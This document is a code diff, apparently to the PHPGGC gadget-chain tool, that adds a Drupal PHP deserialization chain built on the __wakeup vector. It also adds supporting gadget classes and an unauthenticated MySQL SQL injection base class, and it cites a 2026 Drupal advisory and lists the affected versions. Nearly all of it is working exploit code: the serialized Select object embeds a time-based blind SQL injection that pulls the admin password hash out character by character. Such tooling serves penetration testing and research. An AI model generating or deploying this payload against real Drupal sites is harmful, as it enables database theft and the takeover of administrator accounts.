ambionics · HSw109 · Apr 23, 2026 · Apr 23, 2026 · Apr 23, 2026
diff --git a/gadgetchains/Drupal/SQLI/2/chain.php b/gadgetchains/Drupal/SQLI/2/chain.php
@@ -0,0 +1,65 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class SQLI2 extends \PHPGGC\GadgetChain\SQLI\MySQLUnauthenticatedSQLI
+{
+    public static $version = '>= 8.0.0 < 10.5.9 || >= 10.6.0 < 10.6.7 || >= 11.0.0 < 11.2.11 || >= 11.3.0 < 11.3.7';
+    public static $vector = '__wakeup';
+    public static $author = 'hsw109';
+    public static $information = 'Advisory: https://www.drupal.org/sa-core-2026-002
+    Time-based SQLI to directly extract anything in database, change the $expression query below on purpose';
+
+    public function generate(array $parameters)
+    {
+
+        $condition = new \Drupal\Core\Database\Query\Condition([
+                                '#conjunction' => 'AND',
+                                [
+                                    'field' => 'uid',
+                                    'value' => 1,
+                                    'operator' => '=',
+                                ],
+                            ]);
+
+        $having = new \Drupal\Core\Database\Query\Condition([
+                                '#conjunction' => 'AND',
+                                [
+                                    'field' => 'uid',
+                                    'value' => 1,
+                                    'operator' => '=',
+                                ],
+                            ]);
+        $having->goBlank();
+
+        $selectObj = new \Drupal\Core\Database\Query\Select(
+                            $condition,
+                            $having,
+                            [
+                                'u' => [
+                                    'table' => 'users_field_data',
+                                    'alias' => 'u',
+                                    'all_fields' => true,
+                                ]
+                            ],
+                            [
+                                'e' => [
+                                    'expression' => 'IF(ASCII(SUBSTRING((SELECT pass FROM {users_field_data} WHERE uid=1 LIMIT 1),1, 1)) > 0 , SLEEP(5), 0)',
+                                    'alias' => 'e',
+                                    'arguments' => []
+                                ]
+                            ]
+
+                    );
+        return (
+            new \Drupal\views\ViewExecutable(
+                new \Drupal\views\Plugin\views\query\Sql(),
+                new \Drupal\views\Plugin\views\pager\None(),
+                [
+                        'query' => $selectObj,
+                        'count_query' => $selectObj,
+                ]
+            )
+        );
+    }
+}
diff --git a/gadgetchains/Drupal/SQLI/2/gadgets.php b/gadgetchains/Drupal/SQLI/2/gadgets.php
@@ -0,0 +1,84 @@
+<?php
+
+namespace Drupal\views {
+    class ViewExecutable {
+        protected $serializationData = [
+            'executed'          => true,
+            'storage'           => 'content', 
+            'current_display'   => 'default',
+            'args'              => [],
+            'current_page'      => '',
+            'exposed_input'     => [],
+            'exposed_data'      => [],
+            'exposed_raw_input' => [],
+            'dom_id'            => '',
+        ];
+        public $built = true;
+        public $live_preview = true;
+        public $query;
+        public $pager;
+        public $build_info;
+
+        function __construct($query, $pager, $build_info) {
+            $this->query = $query;
+            $this->pager = $pager;
+            $this->build_info = $build_info;
+        }
+    }
+}
+
+
+namespace Drupal\views\Plugin\views\pager {
+    class None {
+    }
+}
+
+namespace Drupal\views\Plugin\views\query {
+    class Sql {
+        private $options = [
+            'disable_sql_rewrite' => 'TRUE' 
+        ];
+    }
+}
+
+namespace Drupal\Core\Database\Query {
+    class Select {
+        private $connectionTarget = 'default';
+        private $connectionKey = 'default';
+        private $queryOptions = [];
+        private $uniqueIdentifier;
+        private $nextPlaceholder = 0;
+        private $condition;
+        private $having;
+        private $union = [];
+        private $tables;
+        private $fields = [];
+        private $expressions;
+
+        function __construct($condition, $having, $tables, $expressions){
+            $this->uniqueIdentifier = uniqid('', true);
+            $this->condition = $condition;
+            $this->having = $having;
+            $this->tables = $tables;
+            $this->expressions= $expressions;
+        }
+    }
+
+    class Condition {
+
+        private $conditions;
+        private $arguments = [];
+        private $changed = true;
+        private $queryPlaceholderIdentifier = null;
+        private $stringVersion = null;
+
+        public function __construct($conditions) {
+            $this->conditions = $conditions;
+        }
+
+        public function goBlank() {
+        unset($this->arguments, $this->changed, $this->queryPlaceholderIdentifier, $this->stringVersion);
+        }  
+    } 
+
+}
diff --git a/lib/PHPGGC/GadgetChain/SQLI/MySQLUnauthenticatedSQLI.php b/lib/PHPGGC/GadgetChain/SQLI/MySQLUnauthenticatedSQLI.php
@@ -0,0 +1,21 @@
+<?php
+
+namespace PHPGGC\GadgetChain\SQLI;
+
+/**
+ * Class MySQLUnauthenticatedSQLI.php
+ * Performs SQL injection without configurable database credentials
+ * @package PHPGGC\GadgetChain\SQLI
+ */
+abstract class MySQLUnauthenticatedSQLI extends \PHPGGC\GadgetChain\SqlInjection
+{
+    public static $type_description = 'MySQL Unauthenticated SQL injection';
+
+    public static $parameters = [
+    ];
+
+    public function test_setup()
+    {
+        throw new \PHPGGC\Exception("SQL injection payloads cannot be tested.");
+    }
+}